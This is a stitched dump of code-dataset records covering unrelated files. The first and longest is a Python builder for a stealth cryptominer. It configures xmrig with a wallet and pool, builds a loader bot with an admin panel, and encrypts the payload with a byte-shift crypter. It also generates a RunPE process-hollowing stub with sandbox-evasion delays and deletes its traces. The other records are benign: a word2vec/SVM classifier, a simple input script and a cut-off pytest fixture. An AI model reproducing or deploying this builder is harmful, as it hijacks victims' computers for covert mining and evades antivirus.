5) * 1000);\n RunPortableExecutable(rawData);\n return 0;\n } \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n compileM(os.getcwd() + '\\\\src\\\\', 'ConsoleApplication1')\n xcopy(os.getcwd() + '\\\\src\\\\Release\\\\Crypter.exe', os.getcwd() +\n '\\\\' + name + '.exe')\n\n\nkey = random.randint(1, 100)\nu = sys.argv[1]\nw = sys.argv[2]\np = sys.argv[3]\nl = sys.argv[4]\na = sys.argv[5]\nload_userdata(u, p, w, l, a)\ncompile(os.getcwd() + '\\\\Bot\\\\', 'LoaderBot')\nxcopy(os.getcwd() + '\\\\Bot\\\\Miner\\\\bin\\\\Release\\\\LoaderBot.exe', 'Bot.exe')\ncompileR(os.getcwd() + '\\\\rig\\\\', 'xmrig')\nxcopy(os.getcwd() + '\\\\rig\\\\Release\\\\xmrig.exe', 'out.exe')\ncrypt('test', key)\nos.system('C:\\\\Python27\\\\python.exe cv.py')\nwriteBytes(key)\ncompileM(os.getcwd() + '\\\\Miner\\\\', 'winhost')\nxcopy(os.getcwd() + '\\\\Miner\\\\Release\\\\winhost.exe', 'in.exe')\nprint(os.getcwd() + '\\\\enc.exe')\nsubprocess.call(os.getcwd() + '\\\\enc.exe')\ncrypt('winhost', key)\nos.system('del file.txt')\nos.system('del in.exe')\nos.system('del out.exe')\nos.system('del decr.exe')\nos.system('del enc.exe')\nos.system('del test.exe')\n",
"step-5": "import os, sys, time, random, subprocess\n\n\ndef load_userdata(wallet, pool, ww, logger, adminka):\n with open(\"D:\\\\msys64\\\\xmrig-master\\\\src\\\\ex.cpp\", \"r\") as f:\n file = f.read()\n file = file.replace(\"%u%\", wallet)\n file = file.replace(\"%p%\", pool)\n file = file.replace(\"%w%\", ww)\n with open(\"D:\\\\msys64\\\\xmrig-master\\\\src\\\\xmrig.cpp\", \"w\") as w:\n w.write(file)\n with open(os.getcwd()+\"\\\\Bot\\\\Miner\\\\ex.cs\", \"r\") as f:\n file = f.read()\n file = file.replace(\"%l%\", logger)\n file = file.replace(\"%a%\", adminka)\n with open(os.getcwd()+\"\\\\Bot\\\\Miner\\\\Program.cs\", \"w\") as w:\n w.write(file)\n\ndef writeBytes(key):\n with open(os.getcwd()+\"\\\\file.txt\", \"r\") as f:\n file = f.read()\n with open(os.getcwd()+\"\\\\Miner\\\\CryptRunPe\\\\winhost.cpp\", \"w\") as w:\n w.write(\"#include <stdafx.h>\\n#include \\\"process.h\\\"\\n #include \\\"memrun.h\\\"\\nusing namespace std;\\n\")\n with open(\"ex.txt\") as ex:\n w.write(file)\n exx = ex.read()\n w.write(exx)\n\ndef compile(path, file):\n os.system(\"%windir%\\Microsoft.NET\\Framework\\\\v4.0.30319\\msbuild.exe \\\"\"+path+file+\".sln\\\" /p:Configuration=Release\")\n\t\ndef compileM(path, file):\n os.system(\"msbuild.exe \\\"\"+path+file+\".sln\\\" /p:Configuration=Release\")\n\ndef compileR(path, file):\n os.system(\"msbuild.exe \\\"\"+path+file+\".sln\\\" /p:Configuration=Release /p:Platform=\\\"WIN32\\\"\")\ndef xcopy(path, out):\n try:\n with open(path, \"rb\") as f:\n file = f.read()\n with open(out, \"wb\") as w:\n w.write(bytearray(file))\n except:\n pass\n\n\ndef crypt(name, key):\n with open('encoder.cpp', 'w') as w:\n txt = '\\n\\\n #include <Windows.h>\\n\\\n #include <winternl.h>\\n\\\n #include <iostream>\\n\\\n #include <string>\\n\\\n #include <fstream>\\n\\\n using namespace std;\\n\\\n int main()\\n\\\n {\\n\\\n FILE * file = fopen(\"in.exe\", \"rb\");\\n\\\n if (file == NULL) return 0;\\n\\\n fseek(file, 0, SEEK_END);\\n\\\n long int size = ftell(file);\\n\\\n fclose(file);\\n\\\n file = fopen(\"in.exe\", \"rb\");\\n\\\n unsigned char * in = (unsigned char *)malloc(size);\\n\\\n int bytes_read = fread(in, sizeof(unsigned char), size, file);\\n\\\n fclose(file);\\n\\\n for (int i = 0; i < size; i++) {\\n\\\n in[i] = in[i] - 0x0%n%;\\n\\\n }\\n\\\n file = fopen(\"out.exe\", \"wb\");\\n\\\n int bytes_written = fwrite(in, sizeof(unsigned char), size, file);\\n\\\n fclose(file);\\n\\\n for (int i = 0; i < size; i++) {\\n\\\n in[i] = in[i] + 0x0%n%;\\n\\\n }\\n\\\n file = fopen(\"decr.exe\", \"wb\");\\n\\\n bytes_written = fwrite(in, sizeof(unsigned char), size, file);\\n\\\n fclose(file);\\n\\\n return 0;\\n\\\n }\\n\\\n '\n txt = txt.replace(\"%n%\", str(key))\n w.write(txt)\n os.system(\"g++ -o enc encoder.cpp\")\n os.system(\"C:\\Python27\\python.exe cv.py\")\n with open('file.txt', 'r') as r:\n with open(os.getcwd()+\"\\\\src\\\\crypter\\\\crypter.cpp\", \"w\") as w:\n txt = '\\\n #include \"stdafx.h\"\\n\\\n #include \"Crypter.h\"\\n\\\n #include <windows.h>\\n\\\n #include <winternl.h>\\n\\\n #pragma comment(lib,\"ws2_32.lib\")\\n\\\n #pragma comment(lib,\"ntdll.lib\")\\n\\\n '+ r.read() + '\\\n int RunPortableExecutable(void* Image) {\\n\\\n IMAGE_DOS_HEADER* DOSHeader;\\n\\\n IMAGE_NT_HEADERS* NtHeader;\\n\\\n IMAGE_SECTION_HEADER* SectionHeader;\\n\\\n PROCESS_INFORMATION PI;\\n\\\n STARTUPINFOA SI;\\n\\\n CONTEXT* CTX;\\n\\\n DWORD* ImageBase;\\n\\\n void* pImageBase;\\n\\\n int count;\\n\\\n char buffer[MAX_PATH];\\n\\\n GetModuleFileNameA(NULL, 
(LPSTR)buffer, MAX_PATH);\\n\\\n char *CurrentFilePath = buffer;\\n\\\n DOSHeader = PIMAGE_DOS_HEADER(Image);\\n\\\n NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);\\n\\\n if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {\\n\\\n ZeroMemory(&PI, sizeof(PI));\\n\\\n ZeroMemory(&SI, sizeof(SI));\\n\\\n typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);\\n\\\n NtUnmapViewOfSection mNtUnmapViewOfSection;\\n\\\n if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {\\n\\\n CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));\\n\\\n CTX->ContextFlags = CONTEXT_FULL;\\n\\\n if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {\\n\\\n ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);\\n\\\n pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),\\n\\\n NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);\\n\\\n WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);\\n\\\n for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {\\n\\\n SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));\\n\\\n WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),\\n\\\n LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);\\n\\\n }\\n\\\n WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);\\n\\\n CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;\\n\\\n SetThreadContext(PI.hThread, LPCONTEXT(CTX));\\n\\\n ResumeThread(PI.hThread);\\n\\\n return 0;\\n\\\n }\\n\\\n }\\n\\\n }\\n\\\n }\\n\\\n int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {\\n\\\n for (int i = 0; i < 550000; i++)\\n\\\n OutputDebugStringW(L\"\");\\n\\\n for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {\\n\\\n unsigned char b = rawData[i] + 0x0%n%;\\n\\\n rawData[i] = b;\\n\\\n }\\n\\\n Sleep(((rand() % 5 + 1) + 5) * 1000);\\n\\\n RunPortableExecutable(rawData);\\n\\\n return 0;\\n\\\n }\\\n '\n txt = txt.replace(\"%n%\", str(key))\n w.write(txt)\n compileM(os.getcwd()+\"\\\\src\\\\\", \"ConsoleApplication1\")\n xcopy(os.getcwd() + \"\\\\src\\\\Release\\\\Crypter.exe\", os.getcwd()+\"\\\\\"+name+\".exe\")\n\nkey = random.randint(1, 100)\nu = sys.argv[1]\nw = sys.argv[2]\np = sys.argv[3]\nl = sys.argv[4]\na = sys.argv[5]\n\n\n\nload_userdata(u, p, w, l, a)\ncompile(os.getcwd()+\"\\\\Bot\\\\\", \"LoaderBot\")\nxcopy(os.getcwd()+\"\\\\Bot\\\\Miner\\\\bin\\\\Release\\\\LoaderBot.exe\", \"Bot.exe\")\ncompileR(os.getcwd()+\"\\\\rig\\\\\", \"xmrig\")\nxcopy(os.getcwd()+\"\\\\rig\\\\Release\\\\xmrig.exe\", \"out.exe\")\ncrypt(\"test\", key)\nos.system(\"C:\\Python27\\python.exe cv.py\")\nwriteBytes(key)\ncompileM(os.getcwd()+\"\\\\Miner\\\\\", \"winhost\")\nxcopy(os.getcwd()+\"\\\\Miner\\\\Release\\\\winhost.exe\", \"in.exe\")\nprint(os.getcwd()+\"\\\\enc.exe\")\nsubprocess.call(os.getcwd()+\"\\\\enc.exe\")\ncrypt(\"winhost\", key)\n\nos.system(\"del file.txt\")\nos.system(\"del in.exe\")\nos.system(\"del out.exe\")\nos.system(\"del decr.exe\")\nos.system(\"del enc.exe\")\nos.system(\"del test.exe\")\n",
"step-ids": [
6,
7,
8,
9,
11
]
}
|
[
6,
7,
8,
9,
11
] |
../../3.1.1/_downloads/b19d86251aea30061514e17fba258dab/nan_test.py
|
normal
|
{
"blob_id": "23bd2ed783ab117bee321d97aa1c70698bdeb387",
"index": 4587,
"step-1": "../../3.1.1/_downloads/b19d86251aea30061514e17fba258dab/nan_test.py",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from sklearn.naive_bayes import BernoulliNB
from sklearn import svm
from sklearn.pipeline import Pipeline
from sklearn.metrics import classification_report, confusion_matrix
from optparse import OptionParser
from helper import FileHelper, Word2VecHelper, GraphHelper
from helper.VectorHelper import MeanEmbeddingVectorizer
import os
import sys
def trainW2v(args):
clazz = [["Accidents", "Arts", "Attacks", "Economy", "Miscellaneous", "Politics", "Science", "Sports","undefined"], ["Accidents", "Arts", "Attacks", "Economy", "Miscellaneous", "Politics", "Science", "Sports"], ['positive', 'negative']]
models = ['rbf', 'poly']
FileHelper.create("log")
C = 0.5 # SVM regularization parameter
gamma = 0.5
degree = 6
types = ['generic', 'specific']
if args.ontology =='dbpedia':
types.append('normal')
for classes in clazz:
task = 'pipeline2' if len(classes) == 9 else 'task2' if len(classes) == 8 else 'task1'
train_instances, train_labels, train_texts = Word2VecHelper.loadData(classes, args, 'train')
test_instances, test_labels, test_texts = Word2VecHelper.loadData(classes, args, 'test')
        # Redirect stdout so the reports printed below are captured in a per-task log file.
        sys.stdout = open(
            "log/{}_{}.txt".format(args.ontology, task), "w")
for model in models:
args.classifier = model
for _type in types:
args.type = _type
for merge in range(2):
args.merge = merge
                    if args.force == 1 or not os.path.exists("{}_{}_{}.bin".format(args.ontology, args.type, 'merged' if args.merge == 1 else 'simple')):
                        files = ["./train/{}/{}/positive.txt".format(args.ontology, args.type),
                                 "./train/{}/{}/negative.txt".format(args.ontology, args.type)]
                        # Renamed from `model` so the outer loop variable (the SVM kernel name) is not shadowed.
                        w2v_model = Word2VecHelper.createModel(files, name="{}_{}".format(args.ontology, args.type),
                                                               merge=args.merge)
                    else:
                        w2v_model = Word2VecHelper.loadModel("{}_{}".format(args.ontology, args.type), merge=args.merge)

                    w2v = {w: vec for w, vec in zip(w2v_model.wv.index2word, w2v_model.wv.syn0)}
print("========== Model", args.ontology, args.type, args.merge, task, args.classifier, "==========")
if args.classifier == 'ben':
classifier = Pipeline([("w2v vect", MeanEmbeddingVectorizer(w2v)),
("clf", BernoulliNB())])
else:
classifier = Pipeline([("w2v vect", MeanEmbeddingVectorizer(w2v)),
("clf", svm.SVC(kernel=args.classifier, degree=degree, C=C, gamma=gamma,
probability=True))])
y_score = classifier.fit(train_texts, train_labels).predict_proba(test_texts)
y_pred = classifier.predict(test_texts)
#f.write("========= Classification Report ==========\n")
print("========= Classification Report ==========")
print(classification_report(test_labels, y_pred))
#f.write(classification_report(test_labels, y_pred)+"\n")
print("========= Confusion Matrix ==========")
#f.write("========= Confusion Matrix ==========\n")
print(confusion_matrix(test_labels,y_pred, labels=classes))
#f.write(confusion_matrix(test_labels,y_pred, labels=classes)+"\n")
GraphHelper.savePrediction("{}_{}_{}_{}_{}".format(args.ontology,args.type,args.classifier,task, args.merge), y_pred=y_pred,y_score=y_score,classes=classes,y=test_labels )
GraphHelper.saveClassifier(classifier, "{}_{}_{}_{}_{}.pkl".format(args.ontology,args.type,args.classifier,task, args.merge))
if __name__ == "__main__":
parser = OptionParser('''%prog -o ontology -t type -f force ''')
parser.add_option('-o', '--ontology', dest='ontology', default="dbpedia")
parser.add_option('-t', '--type', dest='type', default="generic")
parser.add_option('-f', '--force', dest='force', default=0, type=int)
parser.add_option('-c', '--classifier', dest='classifier', default='poly')
parser.add_option('-j', '--job', dest='job', type=int, default=10)
parser.add_option('-w', '--window', dest='window', type=int, default=2)
parser.add_option('-s', '--size', dest='size', type=int, default=300)
parser.add_option('-m', '--merge', dest='merge', type=int, default=0)
parser.add_option('-e', '--experiment', dest='experiment', type=int, default=1)
opts, args = parser.parse_args()
trainW2v(opts)
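
# Note: MeanEmbeddingVectorizer comes from helper.VectorHelper, which is not
# shown in this file. A typical implementation of the idea (an illustrative
# sketch under that assumption, not the project's actual code) averages the
# word2vec vectors of a text's tokens:
#
#   import numpy as np
#
#   class MeanEmbeddingVectorizer(object):
#       def __init__(self, word2vec):
#           self.word2vec = word2vec
#           self.dim = len(next(iter(word2vec.values()))) if word2vec else 0
#
#       def fit(self, X, y=None):
#           return self
#
#       def transform(self, X):
#           # Average the vectors of known tokens; texts with no known tokens get zeros.
#           return np.array([
#               np.mean([self.word2vec[w] for w in text.split() if w in self.word2vec]
#                       or [np.zeros(self.dim)], axis=0)
#               for text in X
#           ])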
|
normal
|
{
"blob_id": "3bc9c6a66f749858ea5801202b0ac80755c1b347",
"index": 6493,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef trainW2v(args):\n clazz = [['Accidents', 'Arts', 'Attacks', 'Economy', 'Miscellaneous',\n 'Politics', 'Science', 'Sports', 'undefined'], ['Accidents', 'Arts',\n 'Attacks', 'Economy', 'Miscellaneous', 'Politics', 'Science',\n 'Sports'], ['positive', 'negative']]\n models = ['rbf', 'poly']\n FileHelper.create('log')\n C = 0.5\n gamma = 0.5\n degree = 6\n types = ['generic', 'specific']\n if args.ontology == 'dbpedia':\n types.append('normal')\n for classes in clazz:\n task = 'pipeline2' if len(classes) == 9 else 'task2' if len(classes\n ) == 8 else 'task1'\n train_instances, train_labels, train_texts = Word2VecHelper.loadData(\n classes, args, 'train')\n test_instances, test_labels, test_texts = Word2VecHelper.loadData(\n classes, args, 'test')\n sys.stdout = open('log/{}_{}.txt'.format(args.ontology, task), 'w')\n for model in models:\n args.classifier = model\n for _type in types:\n args.type = _type\n for merge in range(2):\n args.merge = merge\n if args.force == 1 or not os.path.exists('{}_{}_{}.bin'\n .format(args.ontology, args.type, 'merged' if args.\n merge == 1 else 'simple')):\n files = ['./train/{}/{}/positive.txt'.format(args.\n ontology, args.type),\n './train/{}/{}/negative.txt'.format(args.\n ontology, args.type)]\n model = Word2VecHelper.createModel(files, name=\n '{}_{}'.format(args.ontology, args.type), merge\n =args.merge)\n else:\n model = Word2VecHelper.loadModel('{}_{}'.format(\n args.ontology, args.type), merge=args.merge)\n w2v = {w: vec for w, vec in zip(model.wv.index2word,\n model.wv.syn0)}\n print('========== Model', args.ontology, args.type,\n args.merge, task, args.classifier, '==========')\n if args.classifier == 'ben':\n classifier = Pipeline([('w2v vect',\n MeanEmbeddingVectorizer(w2v)), ('clf',\n BernoulliNB())])\n else:\n classifier = Pipeline([('w2v vect',\n MeanEmbeddingVectorizer(w2v)), ('clf', svm.SVC(\n kernel=args.classifier, degree=degree, C=C,\n gamma=gamma, probability=True))])\n y_score = classifier.fit(train_texts, train_labels\n ).predict_proba(test_texts)\n y_pred = classifier.predict(test_texts)\n print('========= Classification Report ==========')\n print(classification_report(test_labels, y_pred))\n print('========= Confusion Matrix ==========')\n print(confusion_matrix(test_labels, y_pred, labels=classes)\n )\n GraphHelper.savePrediction('{}_{}_{}_{}_{}'.format(args\n .ontology, args.type, args.classifier, task, args.\n merge), y_pred=y_pred, y_score=y_score, classes=\n classes, y=test_labels)\n GraphHelper.saveClassifier(classifier,\n '{}_{}_{}_{}_{}.pkl'.format(args.ontology, args.\n type, args.classifier, task, args.merge))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef trainW2v(args):\n clazz = [['Accidents', 'Arts', 'Attacks', 'Economy', 'Miscellaneous',\n 'Politics', 'Science', 'Sports', 'undefined'], ['Accidents', 'Arts',\n 'Attacks', 'Economy', 'Miscellaneous', 'Politics', 'Science',\n 'Sports'], ['positive', 'negative']]\n models = ['rbf', 'poly']\n FileHelper.create('log')\n C = 0.5\n gamma = 0.5\n degree = 6\n types = ['generic', 'specific']\n if args.ontology == 'dbpedia':\n types.append('normal')\n for classes in clazz:\n task = 'pipeline2' if len(classes) == 9 else 'task2' if len(classes\n ) == 8 else 'task1'\n train_instances, train_labels, train_texts = Word2VecHelper.loadData(\n classes, args, 'train')\n test_instances, test_labels, test_texts = Word2VecHelper.loadData(\n classes, args, 'test')\n sys.stdout = open('log/{}_{}.txt'.format(args.ontology, task), 'w')\n for model in models:\n args.classifier = model\n for _type in types:\n args.type = _type\n for merge in range(2):\n args.merge = merge\n if args.force == 1 or not os.path.exists('{}_{}_{}.bin'\n .format(args.ontology, args.type, 'merged' if args.\n merge == 1 else 'simple')):\n files = ['./train/{}/{}/positive.txt'.format(args.\n ontology, args.type),\n './train/{}/{}/negative.txt'.format(args.\n ontology, args.type)]\n model = Word2VecHelper.createModel(files, name=\n '{}_{}'.format(args.ontology, args.type), merge\n =args.merge)\n else:\n model = Word2VecHelper.loadModel('{}_{}'.format(\n args.ontology, args.type), merge=args.merge)\n w2v = {w: vec for w, vec in zip(model.wv.index2word,\n model.wv.syn0)}\n print('========== Model', args.ontology, args.type,\n args.merge, task, args.classifier, '==========')\n if args.classifier == 'ben':\n classifier = Pipeline([('w2v vect',\n MeanEmbeddingVectorizer(w2v)), ('clf',\n BernoulliNB())])\n else:\n classifier = Pipeline([('w2v vect',\n MeanEmbeddingVectorizer(w2v)), ('clf', svm.SVC(\n kernel=args.classifier, degree=degree, C=C,\n gamma=gamma, probability=True))])\n y_score = classifier.fit(train_texts, train_labels\n ).predict_proba(test_texts)\n y_pred = classifier.predict(test_texts)\n print('========= Classification Report ==========')\n print(classification_report(test_labels, y_pred))\n print('========= Confusion Matrix ==========')\n print(confusion_matrix(test_labels, y_pred, labels=classes)\n )\n GraphHelper.savePrediction('{}_{}_{}_{}_{}'.format(args\n .ontology, args.type, args.classifier, task, args.\n merge), y_pred=y_pred, y_score=y_score, classes=\n classes, y=test_labels)\n GraphHelper.saveClassifier(classifier,\n '{}_{}_{}_{}_{}.pkl'.format(args.ontology, args.\n type, args.classifier, task, args.merge))\n\n\nif __name__ == '__main__':\n parser = OptionParser('%prog -o ontology -t type -f force ')\n parser.add_option('-o', '--ontology', dest='ontology', default='dbpedia')\n parser.add_option('-t', '--type', dest='type', default='generic')\n parser.add_option('-f', '--force', dest='force', default=0, type=int)\n parser.add_option('-c', '--classifier', dest='classifier', default='poly')\n parser.add_option('-j', '--job', dest='job', type=int, default=10)\n parser.add_option('-w', '--window', dest='window', type=int, default=2)\n parser.add_option('-s', '--size', dest='size', type=int, default=300)\n parser.add_option('-m', '--merge', dest='merge', type=int, default=0)\n parser.add_option('-e', '--experiment', dest='experiment', type=int,\n default=1)\n opts, args = parser.parse_args()\n trainW2v(opts)\n",
"step-4": "from sklearn.naive_bayes import *\nfrom sklearn import svm\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.metrics import classification_report, confusion_matrix\nfrom optparse import OptionParser\nfrom helper import FileHelper, Word2VecHelper, GraphHelper\nimport helper\nfrom helper.VectorHelper import *\nimport os\nimport sys\n\n\ndef trainW2v(args):\n clazz = [['Accidents', 'Arts', 'Attacks', 'Economy', 'Miscellaneous',\n 'Politics', 'Science', 'Sports', 'undefined'], ['Accidents', 'Arts',\n 'Attacks', 'Economy', 'Miscellaneous', 'Politics', 'Science',\n 'Sports'], ['positive', 'negative']]\n models = ['rbf', 'poly']\n FileHelper.create('log')\n C = 0.5\n gamma = 0.5\n degree = 6\n types = ['generic', 'specific']\n if args.ontology == 'dbpedia':\n types.append('normal')\n for classes in clazz:\n task = 'pipeline2' if len(classes) == 9 else 'task2' if len(classes\n ) == 8 else 'task1'\n train_instances, train_labels, train_texts = Word2VecHelper.loadData(\n classes, args, 'train')\n test_instances, test_labels, test_texts = Word2VecHelper.loadData(\n classes, args, 'test')\n sys.stdout = open('log/{}_{}.txt'.format(args.ontology, task), 'w')\n for model in models:\n args.classifier = model\n for _type in types:\n args.type = _type\n for merge in range(2):\n args.merge = merge\n if args.force == 1 or not os.path.exists('{}_{}_{}.bin'\n .format(args.ontology, args.type, 'merged' if args.\n merge == 1 else 'simple')):\n files = ['./train/{}/{}/positive.txt'.format(args.\n ontology, args.type),\n './train/{}/{}/negative.txt'.format(args.\n ontology, args.type)]\n model = Word2VecHelper.createModel(files, name=\n '{}_{}'.format(args.ontology, args.type), merge\n =args.merge)\n else:\n model = Word2VecHelper.loadModel('{}_{}'.format(\n args.ontology, args.type), merge=args.merge)\n w2v = {w: vec for w, vec in zip(model.wv.index2word,\n model.wv.syn0)}\n print('========== Model', args.ontology, args.type,\n args.merge, task, args.classifier, '==========')\n if args.classifier == 'ben':\n classifier = Pipeline([('w2v vect',\n MeanEmbeddingVectorizer(w2v)), ('clf',\n BernoulliNB())])\n else:\n classifier = Pipeline([('w2v vect',\n MeanEmbeddingVectorizer(w2v)), ('clf', svm.SVC(\n kernel=args.classifier, degree=degree, C=C,\n gamma=gamma, probability=True))])\n y_score = classifier.fit(train_texts, train_labels\n ).predict_proba(test_texts)\n y_pred = classifier.predict(test_texts)\n print('========= Classification Report ==========')\n print(classification_report(test_labels, y_pred))\n print('========= Confusion Matrix ==========')\n print(confusion_matrix(test_labels, y_pred, labels=classes)\n )\n GraphHelper.savePrediction('{}_{}_{}_{}_{}'.format(args\n .ontology, args.type, args.classifier, task, args.\n merge), y_pred=y_pred, y_score=y_score, classes=\n classes, y=test_labels)\n GraphHelper.saveClassifier(classifier,\n '{}_{}_{}_{}_{}.pkl'.format(args.ontology, args.\n type, args.classifier, task, args.merge))\n\n\nif __name__ == '__main__':\n parser = OptionParser('%prog -o ontology -t type -f force ')\n parser.add_option('-o', '--ontology', dest='ontology', default='dbpedia')\n parser.add_option('-t', '--type', dest='type', default='generic')\n parser.add_option('-f', '--force', dest='force', default=0, type=int)\n parser.add_option('-c', '--classifier', dest='classifier', default='poly')\n parser.add_option('-j', '--job', dest='job', type=int, default=10)\n parser.add_option('-w', '--window', dest='window', type=int, default=2)\n parser.add_option('-s', '--size', 
dest='size', type=int, default=300)\n parser.add_option('-m', '--merge', dest='merge', type=int, default=0)\n parser.add_option('-e', '--experiment', dest='experiment', type=int,\n default=1)\n opts, args = parser.parse_args()\n trainW2v(opts)\n",
"step-5": "from sklearn.naive_bayes import *\nfrom sklearn import svm\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.metrics import classification_report, confusion_matrix\nfrom optparse import OptionParser\nfrom helper import FileHelper, Word2VecHelper, GraphHelper\nimport helper\nfrom helper.VectorHelper import *\n\nimport os\nimport sys\n\n\n#log = helper.enableLog()\n\ndef trainW2v(args):\n clazz = [[\"Accidents\", \"Arts\", \"Attacks\", \"Economy\", \"Miscellaneous\", \"Politics\", \"Science\", \"Sports\",\"undefined\"], [\"Accidents\", \"Arts\", \"Attacks\", \"Economy\", \"Miscellaneous\", \"Politics\", \"Science\", \"Sports\"], ['positive', 'negative']]\n models = ['rbf', 'poly']\n FileHelper.create(\"log\")\n\n C = 0.5 # SVM regularization parameter\n gamma = 0.5\n degree = 6\n types = ['generic', 'specific']\n if args.ontology =='dbpedia':\n types.append('normal')\n\n for classes in clazz:\n task = 'pipeline2' if len(classes) == 9 else 'task2' if len(classes) == 8 else 'task1'\n train_instances, train_labels, train_texts = Word2VecHelper.loadData(classes, args, 'train')\n test_instances, test_labels, test_texts = Word2VecHelper.loadData(classes, args, 'test')\n\n sys.stdout = open(\n \"log/{}_{}.txt\".format(args.ontology, task), \"w\")\n\n for model in models:\n args.classifier = model\n\n for _type in types:\n args.type = _type\n for merge in range(2):\n args.merge = merge\n if args.force == 1 or not os.path.exists(\"{}_{}_{}.bin\".format(args.ontology, args.type, 'merged' if args.merge==1 else 'simple')):\n files = [\"./train/{}/{}/positive.txt\".format(args.ontology, args.type),\n \"./train/{}/{}/negative.txt\".format(args.ontology, args.type)]\n model = Word2VecHelper.createModel(files, name=\"{}_{}\".format(args.ontology, args.type),\n merge=args.merge)\n else:\n model = Word2VecHelper.loadModel(\"{}_{}\".format(args.ontology, args.type), merge=args.merge)\n\n w2v = {w: vec for w, vec in zip(model.wv.index2word, model.wv.syn0)}\n\n print(\"========== Model\", args.ontology, args.type, args.merge, task, args.classifier, \"==========\")\n if args.classifier == 'ben':\n classifier = Pipeline([(\"w2v vect\", MeanEmbeddingVectorizer(w2v)),\n (\"clf\", BernoulliNB())])\n else:\n classifier = Pipeline([(\"w2v vect\", MeanEmbeddingVectorizer(w2v)),\n (\"clf\", svm.SVC(kernel=args.classifier, degree=degree, C=C, gamma=gamma,\n probability=True))])\n\n y_score = classifier.fit(train_texts, train_labels).predict_proba(test_texts)\n y_pred = classifier.predict(test_texts)\n #f.write(\"========= Classification Report ==========\\n\")\n print(\"========= Classification Report ==========\")\n print(classification_report(test_labels, y_pred))\n #f.write(classification_report(test_labels, y_pred)+\"\\n\")\n\n print(\"========= Confusion Matrix ==========\")\n #f.write(\"========= Confusion Matrix ==========\\n\")\n print(confusion_matrix(test_labels,y_pred, labels=classes))\n #f.write(confusion_matrix(test_labels,y_pred, labels=classes)+\"\\n\")\n\n GraphHelper.savePrediction(\"{}_{}_{}_{}_{}\".format(args.ontology,args.type,args.classifier,task, args.merge), y_pred=y_pred,y_score=y_score,classes=classes,y=test_labels )\n GraphHelper.saveClassifier(classifier, \"{}_{}_{}_{}_{}.pkl\".format(args.ontology,args.type,args.classifier,task, args.merge))\n\n #f.close()\n\n#trainW2v()\n\nif __name__ == \"__main__\":\n parser = OptionParser('''%prog -o ontology -t type -f force ''')\n parser.add_option('-o', '--ontology', dest='ontology', default=\"dbpedia\")\n parser.add_option('-t', '--type', 
dest='type', default=\"generic\")\n parser.add_option('-f', '--force', dest='force', default=0, type=int)\n parser.add_option('-c', '--classifier', dest='classifier', default='poly')\n parser.add_option('-j', '--job', dest='job', type=int, default=10)\n parser.add_option('-w', '--window', dest='window', type=int, default=2)\n parser.add_option('-s', '--size', dest='size', type=int, default=300)\n parser.add_option('-m', '--merge', dest='merge', type=int, default=0)\n parser.add_option('-e', '--experiment', dest='experiment', type=int, default=1)\n opts, args = parser.parse_args()\n\n trainW2v(opts)",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Create a program that will ask the user's name, age, and reddit username.
# Have it tell them the information back, in the format:
#
# Your name is (blank), you are (blank) years old, and your username is (blank)
#
# For extra credit, have the program log this information in a file to be accessed later.
#
name = input("What is your name? ")
age = input("How old are you? ")
reddit = input("What is your reddit username? ")
print("Your name is " + name + ", you are " + age + " years old, and your username is " + reddit)
|
normal
|
{
"blob_id": "00531c5a7fdcd24204b0546c081bbe7d63d0a6b2",
"index": 1520,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('Your name is ' + name + ', you are ' + age +\n ' years old, and your username is ' + reddit)\n",
"step-3": "name = input('What is your name? ')\nage = input('How old are you? ')\nreddit = input('What is your reddit username? ')\nprint('Your name is ' + name + ', you are ' + age +\n ' years old, and your username is ' + reddit)\n",
"step-4": "# Create a program that will ask the users name, age, and reddit username. \n# Have it tell them the information back, in the format:\n# \n# Your name is (blank), you are (blank) years old, and your username is (blank)\n# \n# For extra credit, have the program log this information in a file to be accessed later.\n# \n\nname = input(\"What is your name? \")\nage = input(\"How old are you? \")\nreddit = input(\"What is your reddit username? \")\n\nprint(\"Your name is \" + name + \", you are \" + age + \" years old, and your username is \" + reddit)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# -*- coding: utf-8 -*-
"""pytest People functions, fixtures and tests."""
import pytest
import ciscosparkapi
from tests.utils import create_string
# Helper Functions
# pytest Fixtures
@pytest.fixture(scope="session")
def me(api):
return api.people.me()
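
# Illustrative only (the original file defines no tests): a minimal test
# built on the fixture above. It assumes the Person object returned by
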